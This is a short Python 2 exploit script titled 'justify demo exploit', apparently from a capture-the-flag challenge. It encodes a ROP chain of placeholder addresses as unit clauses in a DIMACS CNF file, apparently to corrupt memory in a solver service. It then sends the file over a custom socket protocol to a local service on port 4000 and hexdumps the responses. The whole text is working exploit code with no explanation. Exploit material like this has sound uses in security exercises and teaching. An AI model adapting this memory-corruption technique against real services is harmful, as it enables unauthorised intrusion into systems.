



# justify demo exploit

import socket
import struct
from hexdump import hexdump

# the data in the protocol
rop = [0x11223344, 0xAABBCCDD]
var_count = 512+len(rop)*32
clause_count = 0
pcnf = []
def push(x):
  global cnum, clause_count
  cnum += 1  # variables are 1 indexed
  pcnf.append(('-' if x=='0' else '')+str(cnum)+" 0")
  clause_count += 1
cnum = 320
map(push, "0"*32)
cnum = 512
for r in rop:
  map(push, bin(r)[2:][::-1].ljust(32, '0'))
dat = "p cnf %d %d\n" % (var_count, clause_count) + '\n'.join(pcnf)

# send the data and call %
q = lambda x: struct.pack("I",x)
s = socket.create_connection(("127.0.0.1", 4000))

s.send(" ")
print ord(s.recv(1)),

s.send("#"+q(len(dat)))
print ord(s.recv(1)),

s.send("$"+dat)
print ord(s.recv(1)),

s.send("%")

hexdump(s.recv(8192))
hexdump(s.recv(8192))
hexdump(s.recv(8192))

